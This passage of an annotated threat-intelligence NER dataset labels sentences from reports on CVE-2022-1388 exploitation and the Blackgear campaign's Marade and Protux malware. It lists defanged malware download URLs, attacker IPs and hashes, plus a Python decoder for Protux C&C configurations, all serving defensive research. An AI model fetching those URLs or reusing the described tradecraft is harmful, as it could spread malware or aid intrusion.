offset":4245,"end_offset":4326},{"id":49187,"label":"DOMAIN","start_offset":3879,"end_offset":3968}],"relations":[],"Comments":[]} -{"id":3436,"text":"This post is also available in: 日本語 (Japanese) On May 4, 2022, F5 released a security advisory for a remote code execution vulnerability in the iControlREST component of its BIG-IP product tracked in CVE-2022-1388.","entities":[{"id":49195,"label":"vulnerability","start_offset":206,"end_offset":219},{"id":49196,"label":"vulnerability","start_offset":107,"end_offset":142},{"id":49193,"label":"TIME","start_offset":53,"end_offset":67},{"id":49194,"label":"identity","start_offset":69,"end_offset":71},{"id":49197,"label":"tools","start_offset":150,"end_offset":162}],"relations":[{"id":750,"from_id":49196,"to_id":49195,"type":"duplicate-of"},{"id":751,"from_id":49197,"to_id":49195,"type":"has"}],"Comments":[]} -{"id":3437,"text":"Threat actors can exploit this vulnerability to bypass authentication and run arbitrary code on unpatched systems.","entities":[{"id":49198,"label":"attack-pattern","start_offset":48,"end_offset":69},{"id":49200,"label":"vulnerability","start_offset":26,"end_offset":44},{"id":49199,"label":"attack-pattern","start_offset":74,"end_offset":113}],"relations":[{"id":752,"from_id":49198,"to_id":49200,"type":"targets"},{"id":753,"from_id":49199,"to_id":49200,"type":"targets"}],"Comments":[]} -{"id":3438,"text":"This is a critical vulnerability that needs immediate attention, as it was given a 9.8 CVSS score.","entities":[],"relations":[],"Comments":[]} -{"id":3439,"text":"Since the release of this advisory, mass scanning activity has started to occur, seeking unpatched systems, and in-the-wild exploitation has begun. Palo Alto Networks released a Threat Prevention signature for the F5 BIG-IP Authentication Bypass Vulnerability (92570) and within just 10 hours, the signature triggered 2,552 times due to vulnerability scanning and active exploitation attempts.","entities":[{"id":49201,"label":"identity","start_offset":149,"end_offset":168},{"id":49203,"label":"vulnerability","start_offset":225,"end_offset":268},{"id":49204,"label":"TIME","start_offset":285,"end_offset":293},{"id":49202,"label":"tools","start_offset":215,"end_offset":224}],"relations":[{"id":754,"from_id":49202,"to_id":49203,"type":"has"}],"Comments":[]} -{"id":3440,"text":" Unit 42 recommends customers upgrade to the latest release of F5 BIG-IP products.","entities":[{"id":10409,"label":"identity","start_offset":2,"end_offset":9},{"id":49205,"label":"tools","start_offset":64,"end_offset":73}],"relations":[],"Comments":[]} -{"id":3441,"text":"Palo Alto Networks Next Generation Firewall Threat Prevention customers are protected with Signature 92570.","entities":[{"id":49206,"label":"identity","start_offset":0,"end_offset":18}],"relations":[],"Comments":[]} -{"id":3442,"text":" Vulnerable Systems Mitigation Actions Observed in the Wild Conclusion Additional Resources Indicators of Compromise The F5 product vulnerable to CVE-2022-1388 is BIG-IP with the following versions: The vulnerability exists within the iControl REST framework used by BIG-IP.","entities":[{"id":49208,"label":"vulnerability","start_offset":201,"end_offset":218},{"id":49209,"label":"tools","start_offset":118,"end_offset":132},{"id":49207,"label":"vulnerability","start_offset":146,"end_offset":160},{"id":49210,"label":"tools","start_offset":237,"end_offset":260}],"relations":[{"id":755,"from_id":49208,"to_id":49207,"type":"duplicate-of"},{"id":756,"from_id":49209,"to_id":49207,"type":"has"},{"id":757,"from_id":49210,"to_id":49208,"type":"has"}],"Comments":[]} -{"id":3443,"text":" We recommend that customers update their F5 BIG-IP deployments to one of the following versions that have patches to mitigate CVE-2022-1388:","entities":[{"id":49212,"label":"tools","start_offset":42,"end_offset":51},{"id":49211,"label":"vulnerability","start_offset":127,"end_offset":140}],"relations":[{"id":758,"from_id":49212,"to_id":49211,"type":"has"}],"Comments":[]} -{"id":3444,"text":" Until you can install the patched versions of BIG-IP, see the Mitigation section on the F5 security advisory for information on how to mitigate this vulnerability via a workaround to limit the vulnerable component to trusted networks. In response to the F5 security advisory, Palo Alto Networks released the Threat Prevention signature F5 BIG-IP Authentication Bypass Vulnerability (92570) on May 9.","entities":[{"id":49218,"label":"TIME","start_offset":395,"end_offset":400},{"id":49213,"label":"tools","start_offset":47,"end_offset":53},{"id":49215,"label":"identity","start_offset":256,"end_offset":258},{"id":49216,"label":"identity","start_offset":278,"end_offset":296},{"id":49217,"label":"vulnerability","start_offset":338,"end_offset":391},{"id":49214,"label":"identity","start_offset":89,"end_offset":91}],"relations":[],"Comments":[]} -{"id":3445,"text":" We observed this signature triggered 2,552 times between 4:47 and 14:00 UTC on May 10.","entities":[{"id":49219,"label":"TIME","start_offset":50,"end_offset":86}],"relations":[],"Comments":[]} -{"id":3446,"text":"We were able to analyze 2,151 packets that triggered the signature and observed both vulnerability scanning activity and active exploitation attempts.","entities":[],"relations":[],"Comments":[]} -{"id":3447,"text":" Table 1 shows the commands that would be executed in the event of successful exploitation.","entities":[],"relations":[],"Comments":[]} -{"id":3448,"text":"These were found by analysis of the packet captures that triggered the F5 BIG-IP Authentication Bypass Vulnerability signature.","entities":[{"id":49220,"label":"vulnerability","start_offset":81,"end_offset":116},{"id":49221,"label":"tools","start_offset":71,"end_offset":80}],"relations":[{"id":759,"from_id":49221,"to_id":49220,"type":"has"}],"Comments":[]} -{"id":3449,"text":" Table 1. Commands observed in CVE-2022-1388 exploitation attempts.","entities":[{"id":49222,"label":"vulnerability","start_offset":31,"end_offset":44}],"relations":[],"Comments":[]} -{"id":3450,"text":" Palo Alto Networks customers receive protections against the exploitation of this vulnerability in the following ways: Palo Alto Networks will update this Threat Brief with new information and recommendations as they become available.","entities":[{"id":49223,"label":"identity","start_offset":1,"end_offset":19},{"id":49224,"label":"identity","start_offset":121,"end_offset":139}],"relations":[],"Comments":[]} -{"id":3451,"text":" K23605346: BIG-IP iControl REST vulnerability CVE-2022-1388 EnemyBot Attempts to Exploit CVE-2022-1388 30f7e1998d162dfad69d6d8abb763ae4033bbd4a015d170b1ad3e20d39cd4e20 da647646cd36a3acb716b4266e9032f9c1caf555b7667e1dbe5bef89e7d2fdbb b39d2a1202351d3be5d9906ec47ee05c305302124dddec5538dc7b9924c6b85d ad6d44c70f83431bedf890967f2da0607c9b1f79591fb1b2697160f5b1c1a75c 1f93a6696f7bf1b2067cc503583deb4840404ebeeba89579bd303f57000baeb7 9a72aab2a3d1d6e66c185966597a52a8726ca25f5d9e2195af44f98d8b1847d5 53214f4d2d2dfd02b46f416cbdcb6f3a764820a50da4d59926f829b96cf82a6c 20.187.67[.]224 192.132.218[.]149 85.203.23[.]73 116.48.110[.]159 hxxps:\/\/transfer[.]sh\/dlxo3I\/1.sh hxxp:\/\/20.239.193[.]47\/kele.sh hxxp:\/\/20.239.193[.]47\/kele1 hxxp:\/\/20.187.86[.]47\/dadda Updated May 16, 2022 Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[{"id":10440,"label":"malware","start_offset":61,"end_offset":69},{"id":10442,"label":"SHA2","start_offset":170,"end_offset":234},{"id":10443,"label":"SHA2","start_offset":235,"end_offset":299},{"id":10444,"label":"SHA2","start_offset":300,"end_offset":364},{"id":10446,"label":"SHA2","start_offset":430,"end_offset":494},{"id":10447,"label":"SHA2","start_offset":495,"end_offset":559},{"id":10448,"label":"IPV4","start_offset":561,"end_offset":576},{"id":10449,"label":"IPV4","start_offset":577,"end_offset":594},{"id":10450,"label":"IPV4","start_offset":595,"end_offset":609},{"id":10451,"label":"IPV4","start_offset":610,"end_offset":626},{"id":10441,"label":"SHA2","start_offset":105,"end_offset":169},{"id":10445,"label":"SHA2","start_offset":365,"end_offset":429},{"id":49225,"label":"vulnerability","start_offset":12,"end_offset":60},{"id":49228,"label":"DOMAIN","start_offset":662,"end_offset":692},{"id":49229,"label":"DOMAIN","start_offset":693,"end_offset":721},{"id":49226,"label":"vulnerability","start_offset":90,"end_offset":103},{"id":49230,"label":"DOMAIN","start_offset":722,"end_offset":749},{"id":49231,"label":"TIME","start_offset":759,"end_offset":771},{"id":49227,"label":"DOMAIN","start_offset":628,"end_offset":661}],"relations":[{"id":760,"from_id":10440,"to_id":49226,"type":"exploits"}],"Comments":[]} -{"id":3452,"text":" Please mark, I'm not a robot! ","entities":[],"relations":[],"Comments":[]} -{"id":3453,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} -{"id":3454,"text":"Blackgear (also known as Topgear and Comnie) is a cyberespionage campaign dating back to 2008, at least based on the Protux backdoor used by its operators.","entities":[{"id":49232,"label":"campaign","start_offset":0,"end_offset":9},{"id":49233,"label":"campaign","start_offset":25,"end_offset":32},{"id":49234,"label":"campaign","start_offset":37,"end_offset":43},{"id":49235,"label":"TIME","start_offset":89,"end_offset":93},{"id":49236,"label":"malware","start_offset":117,"end_offset":132}],"relations":[{"id":761,"from_id":49233,"to_id":49232,"type":"duplicate-of"},{"id":762,"from_id":49234,"to_id":49232,"type":"duplicate-of"}],"Comments":[]} -{"id":3456,"text":"In 2016, for instance, we found their campaigns attacking Japanese organizations with various malware tools, notably the Elirks backdoor.","entities":[{"id":49240,"label":"TIME","start_offset":3,"end_offset":7},{"id":49241,"label":"malware","start_offset":121,"end_offset":127}],"relations":[],"Comments":[]} -{"id":3457,"text":"Blackgear’s operators are well-organized, developing their own tools, which we observed to have been recently fine-tuned, based on their latest attacks.","entities":[{"id":49242,"label":"threat-actor","start_offset":0,"end_offset":21}],"relations":[],"Comments":[]} -{"id":3458,"text":"A notable characteristic of Blackgear is the degree to which its attacks are taken to evade detection, abusing blogging, microblogging, and social media services to hide its command-and-control (C&C) configuration.","entities":[{"id":49244,"label":"attack-pattern","start_offset":86,"end_offset":101},{"id":49247,"label":"attack-pattern","start_offset":165,"end_offset":213},{"id":49248,"label":"attack-pattern","start_offset":103,"end_offset":161},{"id":49243,"label":"threat-actor","start_offset":28,"end_offset":37}],"relations":[{"id":763,"from_id":49243,"to_id":49244,"type":"uses"},{"id":765,"from_id":49243,"to_id":49247,"type":"uses"},{"id":766,"from_id":49243,"to_id":49248,"type":"uses"}],"Comments":[]} -{"id":3459,"text":"Compared to when C&C information is embedded within the malware, where it’s preset and can thus be easily blocked, this tactic lets Blackgear’s operators to quickly change C&C servers as needed.","entities":[{"id":49249,"label":"threat-actor","start_offset":132,"end_offset":141}],"relations":[],"Comments":[]} -{"id":3460,"text":"It can, in turn, prolong the campaign’s foothold in the system and enable attackers to carry out further lateral movement.","entities":[{"id":49250,"label":"attack-pattern","start_offset":105,"end_offset":121}],"relations":[],"Comments":[]} -{"id":3461,"text":"Analyzing the Marade downloader (detected by Trend Micro as TSPY_MARADE.ZTBC) and the version of Protux (BKDR_PROTUX.ZTBC) employed by Blackgear’s latest campaigns, we found their encrypted configurations on blog and social media posts (see Figure 1).","entities":[{"id":49251,"label":"malware","start_offset":14,"end_offset":31},{"id":49252,"label":"identity","start_offset":45,"end_offset":56},{"id":49254,"label":"malware","start_offset":97,"end_offset":122},{"id":49255,"label":"threat-actor","start_offset":135,"end_offset":144},{"id":49253,"label":"malware","start_offset":60,"end_offset":76}],"relations":[{"id":767,"from_id":49253,"to_id":49251,"type":"duplicate-of"},{"id":768,"from_id":49254,"to_id":49251,"type":"based-on"},{"id":769,"from_id":49251,"to_id":49255,"type":"authored-by"}],"Comments":[]} -{"id":3462,"text":"This can be an indication that these malware tools were developed by the same group.","entities":[],"relations":[],"Comments":[]} -{"id":3463,"text":"Figure 1. Marade’s encrypted configuration on a Facebook post Figure 2. Infection chain of Blackgear’s attack Attack chain","entities":[{"id":49258,"label":"threat-actor","start_offset":91,"end_offset":100},{"id":49256,"label":"malware","start_offset":10,"end_offset":17},{"id":49257,"label":"SOFTWARE","start_offset":48,"end_offset":56}],"relations":[{"id":770,"from_id":49256,"to_id":49257,"type":"uses"}],"Comments":[]} -{"id":3464,"text":"To paint a bigger picture of Blackgear’s attacks, we correlated the tools and tactics they used against their targets.","entities":[{"id":49259,"label":"threat-actor","start_offset":29,"end_offset":38}],"relations":[],"Comments":[]} -{"id":3465,"text":"Here’s a summary of Blackgear’s latest campaign: Use a decoy document or fake installer file, sent via spam email to lure a potential victim into clicking it.","entities":[{"id":49260,"label":"campaign","start_offset":20,"end_offset":47},{"id":49262,"label":"attack-pattern","start_offset":104,"end_offset":114},{"id":49261,"label":"attack-pattern","start_offset":56,"end_offset":93}],"relations":[{"id":771,"from_id":49260,"to_id":49261,"type":"uses"},{"id":772,"from_id":49260,"to_id":49262,"type":"uses"}],"Comments":[]} -{"id":3466,"text":"The decoy document will extract the Marade downloader.","entities":[{"id":49264,"label":"malware","start_offset":36,"end_offset":53},{"id":49265,"label":"attack-pattern","start_offset":4,"end_offset":18}],"relations":[{"id":774,"from_id":49265,"to_id":49264,"type":"delivers"}],"Comments":[]} -{"id":3467,"text":"It drops itself in the machine’s Temp folder and increases its file size to over 50MB in order to bypass traditional sandbox solutions.","entities":[],"relations":[],"Comments":[]} -{"id":3468,"text":"Marade will check if the infected host can connect to the internet and if it is installed with anti-virus (AV) software.","entities":[{"id":49266,"label":"malware","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} -{"id":3469,"text":"If the affected system can connect online and doesn’t have AV software, Marade will connect to a Blackgear-controlled public blog or social media post to retrieve an encrypted C&C configuration.","entities":[{"id":49269,"label":"Infrastucture","start_offset":118,"end_offset":193},{"id":49267,"label":"malware","start_offset":72,"end_offset":78},{"id":49268,"label":"threat-actor","start_offset":97,"end_offset":106}],"relations":[{"id":775,"from_id":49268,"to_id":49269,"type":"controls"},{"id":776,"from_id":49267,"to_id":49269,"type":"beacons-to"}],"Comments":[]} -{"id":3470,"text":"Otherwise, Marade will use the C&C information embedded in its code.","entities":[{"id":49270,"label":"malware","start_offset":11,"end_offset":17}],"relations":[],"Comments":[]} -{"id":3471,"text":"The encrypted strings will pose as a magnet link to keep its malicious traffic from being detected by AV software.","entities":[],"relations":[],"Comments":[]} -{"id":3472,"text":"Marade will then decrypt the encrypted strings and retrieve the C&C server information.","entities":[{"id":49271,"label":"malware","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} -{"id":3473,"text":"The C&C server will send Protux to the victim’s host and execute it.","entities":[{"id":49272,"label":"malware","start_offset":25,"end_offset":31}],"relations":[],"Comments":[]} -{"id":3474,"text":"Protux, a known backdoor, is executed by abusing the rundll32 dynamic-link library (DLL).","entities":[{"id":49273,"label":"malware","start_offset":0,"end_offset":6},{"id":49274,"label":"attack-pattern","start_offset":41,"end_offset":88}],"relations":[{"id":777,"from_id":49273,"to_id":49274,"type":"uses"}],"Comments":[]} -{"id":3475,"text":"It tests the host’s network, retrieves the C&C server from another blog, and uses the RSA algorithm to generate the session key and send information to the C&C server. Blackgear’s malware tools are delivered to targets using RAR self-extracting executable (SFX) files or office Visual Basic Script (VBScript) to create a decoy document.","entities":[{"id":49276,"label":"attack-pattern","start_offset":322,"end_offset":336},{"id":49275,"label":"threat-actor","start_offset":169,"end_offset":178}],"relations":[],"Comments":[]} -{"id":3476,"text":"Below is a screenshot of the SFX files and document used by the latest campaigns: Figure 3.","entities":[],"relations":[],"Comments":[]} -{"id":3477,"text":"Contents of malicious SFX file used by Blackgear, posing as a Flash Player installer Figure 4. Malicious document used by Blackgear (top) and how VBScript is used to execute Marade (bottom)","entities":[{"id":49277,"label":"threat-actor","start_offset":38,"end_offset":48},{"id":49278,"label":"SOFTWARE","start_offset":62,"end_offset":74},{"id":49279,"label":"threat-actor","start_offset":123,"end_offset":132},{"id":49280,"label":"malware","start_offset":175,"end_offset":181}],"relations":[],"Comments":[]} -{"id":3478,"text":"Figure 5.","entities":[],"relations":[],"Comments":[]} -{"id":3479,"text":"Encrypted configurations of Protux (top) and Marade (bottom) in the same blog post Correlating Marade and Protux","entities":[{"id":49281,"label":"malware","start_offset":28,"end_offset":34},{"id":49282,"label":"malware","start_offset":45,"end_offset":51},{"id":49283,"label":"malware","start_offset":95,"end_offset":101},{"id":49284,"label":"malware","start_offset":106,"end_offset":112}],"relations":[{"id":778,"from_id":49283,"to_id":49284,"type":"variant-of"}],"Comments":[]} -{"id":3480,"text":"The encrypted configurations of Marade and Protux can both be found on a single blog post.","entities":[{"id":49285,"label":"malware","start_offset":32,"end_offset":38},{"id":49286,"label":"malware","start_offset":43,"end_offset":49}],"relations":[],"Comments":[]} -{"id":3481,"text":"As shown in Figure 5, the strings highlighted in red function as a search tag to identify the location of the configuration information; those highlighted in orange pertain to the encrypted configuration that Protux will retrieve.","entities":[{"id":49287,"label":"malware","start_offset":209,"end_offset":215}],"relations":[],"Comments":[]} -{"id":3482,"text":"In Blackgear’s previous campaigns, Protux’s configuration format had to be changed to another version.","entities":[{"id":49288,"label":"threat-actor","start_offset":3,"end_offset":12},{"id":49289,"label":"malware","start_offset":35,"end_offset":41}],"relations":[],"Comments":[]} -{"id":3483,"text":"For instance, Protux’s older iteration will look for the “++a++” tag, as shown in Figure 5.","entities":[{"id":49290,"label":"malware","start_offset":14,"end_offset":20}],"relations":[],"Comments":[]} -{"id":3484,"text":"The format used by Protux’s latest version is now similar to Marade’s, as shown in Figure 6.","entities":[{"id":10580,"label":"malware","start_offset":19,"end_offset":25},{"id":49291,"label":"malware","start_offset":61,"end_offset":67}],"relations":[],"Comments":[]} -{"id":3485,"text":"Figure 6.","entities":[],"relations":[],"Comments":[]} -{"id":3486,"text":"Protux’s encrypted configuration on a public blog (note the six magnet URLs; the third is Protux’s latest configuration format)","entities":[{"id":10584,"label":"malware","start_offset":0,"end_offset":6},{"id":10589,"label":"malware","start_offset":90,"end_offset":96}],"relations":[],"Comments":[]} -{"id":3487,"text":"Reverse analysis of Protux’s latest version also allowed us to determine how to decrypt the C&C information, which is done in the Python code shown below.","entities":[{"id":10590,"label":"malware","start_offset":20,"end_offset":26}],"relations":[],"Comments":[]} -{"id":3488,"text":"This can also be used by researchers, system administrators, and information security professionals when decrypting Protux’s latest version.","entities":[{"id":49292,"label":"malware","start_offset":116,"end_offset":122}],"relations":[],"Comments":[]} -{"id":3489,"text":"\/usr","entities":[],"relations":[],"Comments":[]} -{"id":3490,"text":"bin","entities":[],"relations":[],"Comments":[]} -{"id":3491,"text":"env python2","entities":[],"relations":[],"Comments":[]} -{"id":3492,"text":"#-*-coding:utf-8 -*- import os, sys, datetime, operator, base64 def decrypt(): if len(sys.argv) != 2: print \"Usegae : .\/decrypt_protux_magnet.py \" sys.exit(0) str = sys.argv[1] head = str.find(\"magnet:?xt=urn:bhih:\")","entities":[],"relations":[],"Comments":[]} -{"id":3493,"text":"tail = str.find(\"&xl=\") if -1 ==tail: tail = str.find(\"&xl=\") if -1 == head or -1 == tail: print(\"can't find delimiter\") sys.exit()","entities":[],"relations":[],"Comments":[]} -{"id":3494,"text":"b64_data = str[len(\"magnet:?xt=urn:bhih:\"): tail] b64_decode = base64.b64decode(b64_data) key = ord(b64_decode[2]) data = b64_decode[4:] output_file = open(\"C2_info\", \"wb\") for single_byte in data: output_file.write(chr(ord(single_byte) ^ key)) output_file.close()","entities":[],"relations":[],"Comments":[]} -{"id":3495,"text":"if __name__ == '__main__': decrypt (","entities":[],"relations":[],"Comments":[]} -{"id":3496,"text":"A new remote controller tool","entities":[],"relations":[],"Comments":[]} -{"id":3497,"text":"We were also able to source a sample of Protux’s remote controller tool.","entities":[{"id":49293,"label":"malware","start_offset":40,"end_offset":46}],"relations":[],"Comments":[]} -{"id":3498,"text":"This provides a user interface (UI) that allows attackers to send instructions to and monitor any compromised endpoint host.","entities":[],"relations":[],"Comments":[]} -{"id":3499,"text":"This tool can also remotely control Marade in the affected system.","entities":[{"id":49294,"label":"malware","start_offset":36,"end_offset":42}],"relations":[],"Comments":[]} -{"id":3500,"text":" Figure 7.","entities":[],"relations":[],"Comments":[]} -{"id":3501,"text":"The controller retrieving the Marade-related information (top) and collecting Protux-related information (bottom)","entities":[{"id":49296,"label":"malware","start_offset":30,"end_offset":36},{"id":49295,"label":"malware","start_offset":78,"end_offset":84}],"relations":[],"Comments":[]} -{"id":3502,"text":"Based on the controller’s behavior, we can posit that both Marade and Protux were authored by the same threat actors.","entities":[{"id":49298,"label":"malware","start_offset":70,"end_offset":76},{"id":49297,"label":"malware","start_offset":59,"end_offset":65}],"relations":[{"id":780,"from_id":49297,"to_id":49298,"type":"variant-of"}],"Comments":[]} -{"id":3503,"text":"Each serves a specific role once in the system.","entities":[],"relations":[],"Comments":[]} -{"id":3504,"text":"Marade acts as the first stage of attack, sending the compromised system’s information to the C&C server and then awaiting commands from the controller.","entities":[{"id":49299,"label":"malware","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} -{"id":3505,"text":"This allows threat actors to monitor and check whether the affected system is of interest to them.","entities":[],"relations":[],"Comments":[]} -{"id":3506,"text":"If so, the attack moves to the second stage by deploying Protux.","entities":[{"id":49300,"label":"malware","start_offset":57,"end_offset":63}],"relations":[],"Comments":[]} -{"id":3507,"text":"The tool can also control the communication between the backdoor and attacker in real time.","entities":[],"relations":[],"Comments":[]} -{"id":3508,"text":"The following is a list of Protux’s notable components and their functions: FileManage - Lists all of the system’s drives and folders.","entities":[{"id":49301,"label":"malware","start_offset":27,"end_offset":33}],"relations":[],"Comments":[]} -{"id":3509,"text":"ProcManage - Lists all of the processes, modules, threads, and ports in the compromised host.","entities":[],"relations":[],"Comments":[]} -{"id":3510,"text":"ServiceManage - Lists all of the services in the compromised host.","entities":[],"relations":[],"Comments":[]} -{"id":3511,"text":"RegManage - Lists all of the registries in the compromised host.","entities":[],"relations":[],"Comments":[]} -{"id":3512,"text":"ScreenManage - Takes a screenshot.","entities":[],"relations":[],"Comments":[]} -{"id":3513,"text":"ShellManage - Creates a shell.","entities":[],"relations":[],"Comments":[]} -{"id":3514,"text":"Protux:","entities":[{"id":10643,"label":"malware","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} -{"id":3515,"text":"An old dog learning new tricks Protux is an old backdoor, with its first version developed in 2005.","entities":[{"id":10644,"label":"malware","start_offset":31,"end_offset":37},{"id":49302,"label":"TIME","start_offset":94,"end_offset":98}],"relations":[],"Comments":[]} -{"id":3516,"text":"It uses DLL injection to execute its routines.","entities":[],"relations":[],"Comments":[]} -{"id":3517,"text":"Based on this behavior, we can map out a pattern, from the downloader to the decoy documents used.","entities":[],"relations":[],"Comments":[]} -{"id":3518,"text":"The trigger format is: %system32\/rundll32.exe .","entities":[{"id":49303,"label":"FILEPATH","start_offset":23,"end_offset":45}],"relations":[],"Comments":[]} -{"id":3519,"text":"We saw two notable changes throughout Protux’s history: its export name and how it functions:","entities":[{"id":49304,"label":"malware","start_offset":38,"end_offset":44}],"relations":[],"Comments":[]} -{"id":3520,"text":" Export name Year How C&C information is retreieved TStartUp 2005 – 2012","entities":[{"id":49305,"label":"TIME","start_offset":61,"end_offset":72}],"relations":[],"Comments":[]} -{"id":3521,"text":"Directly connect to the C&C server and use DNS server to retrieve the C&C IP address.","entities":[],"relations":[],"Comments":[]} -{"id":3522,"text":"CRestart 2009 – 2014 Use web DNS query to retrieve the C&C IP address, e.g., ip138[.]com.","entities":[{"id":49306,"label":"TIME","start_offset":9,"end_offset":20},{"id":49307,"label":"DOMAIN","start_offset":77,"end_offset":88}],"relations":[],"Comments":[]} -{"id":3523,"text":"CReset 2013 – 2018","entities":[{"id":49308,"label":"malware","start_offset":7,"end_offset":18}],"relations":[],"Comments":[]} -{"id":3524,"text":"Find the encrypted configuration through keywords on blog services.","entities":[],"relations":[],"Comments":[]} -{"id":3525,"text":" Our research into and correlation of Protux led us to several samples that have version numbers embedded in them.","entities":[{"id":10661,"label":"malware","start_offset":39,"end_offset":45}],"relations":[],"Comments":[]} -{"id":3526,"text":"The highlighted portions in Figure 8 show the backdoor’s version number and timestamp with the “with encrypt” strings.","entities":[],"relations":[],"Comments":[]} -{"id":3527,"text":"We also found that these versions encrypt the communication to its C&C servers.","entities":[],"relations":[],"Comments":[]} -{"id":3528,"text":"Protux’s latest version, 3.7, uses the open-source compiler OpenCSP to generate a session key with the RSA algorithm.","entities":[{"id":10665,"label":"malware","start_offset":0,"end_offset":6},{"id":49309,"label":"tools","start_offset":60,"end_offset":67}],"relations":[{"id":781,"from_id":10665,"to_id":49309,"type":"uses"}],"Comments":[]} -{"id":3529,"text":"Figure 8.","entities":[],"relations":[],"Comments":[]} -{"id":3530,"text":"Different versions of Protux used by Blackgear Figure 9.","entities":[{"id":49310,"label":"malware","start_offset":22,"end_offset":28},{"id":49311,"label":"threat-actor","start_offset":37,"end_offset":46}],"relations":[{"id":782,"from_id":49311,"to_id":49310,"type":"uses"}],"Comments":[]} -{"id":3531,"text":"Protux with the OpenCSP encryption function Building a proactive incident response strategy Blackgear has been targeting various industries since its emergence a decade ago.","entities":[{"id":49314,"label":"threat-actor","start_offset":92,"end_offset":101},{"id":49312,"label":"malware","start_offset":0,"end_offset":7},{"id":49313,"label":"tools","start_offset":16,"end_offset":23}],"relations":[],"Comments":[]} -{"id":3532,"text":"Its apparent staying power stems from the furtive ways with which its attacks can evade traditional security solutions.","entities":[],"relations":[],"Comments":[]} -{"id":3533,"text":"For instance, Blackgear employs two stages of infection for each of its attacks.","entities":[{"id":49315,"label":"threat-actor","start_offset":14,"end_offset":23}],"relations":[],"Comments":[]} -{"id":3534,"text":"The potential victim may not be able to notice the intrusions as the first stage involves only profiling and reconnaissance.","entities":[],"relations":[],"Comments":[]} -{"id":3535,"text":"And once infection with a backdoor occurs, typical red flags may not be raised as it abuses microblogging and social media services to retrieve information needed for C&C communication.","entities":[],"relations":[],"Comments":[]} -{"id":3536,"text":"Indeed, Blackgear’s attacks exemplify the need for organizations to develop and implement security strategies that can proactively respond to threats.","entities":[{"id":49316,"label":"threat-actor","start_offset":8,"end_offset":18}],"relations":[],"Comments":[]} -{"id":3537,"text":"A robust threat hunting strategy, for instance, helps validate indicators of attack to ascertain if the intrusions, threats, or suspicious system activities are one-off attacks or part of a larger campaign.","entities":[],"relations":[],"Comments":[]} -{"id":3538,"text":"This further visibility equips organizations with actionable threat intelligence, context, and insights that can be used to delve deeper into an attack — which security gaps are exploited, if the attack has multiple payloads, or if the malware has already spread within the network.","entities":[],"relations":[],"Comments":[]} -{"id":3539,"text":"Organizations can also consider managed detection and response, which provides in-depth threat analysis and correlation — from networks to servers and endpoints — to obtain a complete picture of and further understand a targeted attack.","entities":[],"relations":[],"Comments":[]} -{"id":3540,"text":"Managed detection and response also helps make better sense of system- and network-level activities that an organization may not have the time or resources to do.","entities":[],"relations":[],"Comments":[]} -{"id":3541,"text":"A list of indicators of compromise (IoCs) related to Blackgear is in this appendix.","entities":[{"id":49317,"label":"threat-actor","start_offset":53,"end_offset":62}],"relations":[],"Comments":[]} -{"id":3542,"text":"Trend Micro solutions","entities":[{"id":49318,"label":"identity","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} -{"id":3543,"text":"The Trend Micro™ Deep Discovery™ solution provides detection, in-depth analysis, and proactive response to today’s stealthy malware and targeted attacks in real time.","entities":[{"id":49319,"label":"identity","start_offset":4,"end_offset":15},{"id":49320,"label":"tools","start_offset":17,"end_offset":31}],"relations":[],"Comments":[]} -{"id":3544,"text":"It provides a comprehensive defense tailored to protect organizations against targeted attacks and advanced threats through specialized engines, custom sandboxing, and seamless correlation across the entire attack life cycle, allowing it to detect threats delivered by Blackgear even without any engine or pattern update.","entities":[{"id":49321,"label":"threat-actor","start_offset":269,"end_offset":278}],"relations":[],"Comments":[]} -{"id":3545,"text":"Blackgear’s campaigns also use email as an entry point, which is why it’s important to secure the email gateway.","entities":[{"id":49322,"label":"threat-actor","start_offset":0,"end_offset":9},{"id":49323,"label":"attack-pattern","start_offset":27,"end_offset":54}],"relations":[{"id":783,"from_id":49322,"to_id":49323,"type":"uses"}],"Comments":[]} -{"id":3546,"text":"The Trend Micro™ Hosted Email Security no-maintenance cloud solution delivers continuously updated protection to stop spam, malware, spear phishing, and advanced targeted attacks before they reach the network.","entities":[{"id":49326,"label":"attack-pattern","start_offset":153,"end_offset":178},{"id":49324,"label":"identity","start_offset":4,"end_offset":15},{"id":49325,"label":"attack-pattern","start_offset":133,"end_offset":147}],"relations":[],"Comments":[]} -{"id":3547,"text":"The Trend Micro™ Deep Discovery™ Email Inspector and InterScan™ Web Security solutions prevent malware from ever reaching end users.","entities":[{"id":49329,"label":"tools","start_offset":53,"end_offset":62},{"id":49327,"label":"identity","start_offset":4,"end_offset":15},{"id":49328,"label":"tools","start_offset":17,"end_offset":31}],"relations":[],"Comments":[]} -{"id":3548,"text":"At the endpoint level, the Trend Micro™ Smart Protection Suites deliver several capabilities that minimize the impact of attacks.","entities":[{"id":49330,"label":"identity","start_offset":27,"end_offset":38}],"relations":[],"Comments":[]} -{"id":3549,"text":" Tags Articles, News, Reports | APT & Targeted Attacks | Research","entities":[],"relations":[],"Comments":[]} -{"id":3550,"text":"In November 2019, we published a blog analyzing an exploit kit we named Capesand that exploited Adobe Flash and Microsoft Internet Explorer flaws.","entities":[{"id":49331,"label":"TIME","start_offset":3,"end_offset":16},{"id":49332,"label":"malware","start_offset":72,"end_offset":80},{"id":49333,"label":"SOFTWARE","start_offset":96,"end_offset":107},{"id":49334,"label":"SOFTWARE","start_offset":112,"end_offset":139}],"relations":[{"id":784,"from_id":49332,"to_id":49333,"type":"exploits"},{"id":785,"from_id":49332,"to_id":49334,"type":"exploits"}],"Comments":[]} -{"id":3551,"text":"During our analysis of the indicators of compromise (IoCs) in the deployed samples that were infecting the victim’s machines, we noticed some interesting characteristics: notably that these samples were making use of obfuscation tools that made them virtually undetectable.","entities":[],"relations":[],"Comments":[]} -{"id":3552,"text":"After some data collection we found more than 300 samples that correlate to the mentioned indicators that were recently very active our first detections occurred in August, with the campaign itself still ongoing (having occasional spikes in between).","entities":[{"id":49335,"label":"TIME","start_offset":166,"end_offset":172}],"relations":[],"Comments":[]} -{"id":3553,"text":"We saw a rising usage of tools that provide fully-undetectable obfuscation capabilities – signifying that the authors behind the samples designed their malware variants to be as stealthy as possible.","entities":[],"relations":[],"Comments":[]} -{"id":3554,"text":"We decided to 